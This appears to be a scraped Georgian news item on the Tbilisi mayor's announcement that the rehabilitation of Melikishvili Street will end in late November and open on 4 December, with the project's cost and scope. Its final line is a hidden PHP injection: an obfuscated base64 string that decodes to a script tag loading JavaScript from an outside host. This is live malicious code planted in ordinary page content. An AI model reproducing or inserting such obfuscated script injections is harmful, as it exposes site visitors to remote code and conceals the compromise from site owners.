celsiusi
ავერსი საქკაბელი
თბილისის მერის კახა კალაძის განცხადებით, მელიქიშვილის ქუჩის რეაბილიტაცია, რომელიც მერიამ მიმდინარე წლის ზაფხულში დაიწყო, ნოემბრის ბოლოს დასრულდება, გამზირი კი ოფიციალურად 4 დეკემბერს გაიხსნება.
 
“მელიქიშვილის ქუჩის სარეაბილიტაციო სამუშაოებისას შესრულების ვადების დარღვევა პრობლემა არ ყოფილა, დადგენილი ვადებით სამუშოები ნოემბრის ბოლოს უნდა დასრულებულიყო. დასრულდება და 4 დეკემბერს ქუჩა საგზაო დახაზვების ჩათვლით მოწყობილი იქნება", - აცხადებს თბილისის მერი კახა კალაძე.
 
ცნობისთვის, მელიქიშვილის ქუჩის რეაბილიტაცია თბილისის მერიამ ივნისში დაიწყო. პროექტის ღირებულება 6.4 მლნ ლარია და სამუშაოებისთვის გამოცხადებულ ტენდერში კომპანია B.M.C-მ გაიმარჯვა.
 
პროექტი მიწისქვეშა საკომუნიკაციო ქსელების შეცვლას, სანიაღვრე ქსელის მოწყობას, წყლისა და წყალარინების სისტემების, გაზმომარაგების მილების განახლებას, ელექტროგადამცემი ხაზები მიწის ქვეშ განთავსებას და განათების ქსელი LED სანათებით დამონტაჟებას, ასევე ტროტუარების, მოსაცდელების, საავტობუსო ზოლების და ველობილიკის მოწყობას მოიცავს.
425
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");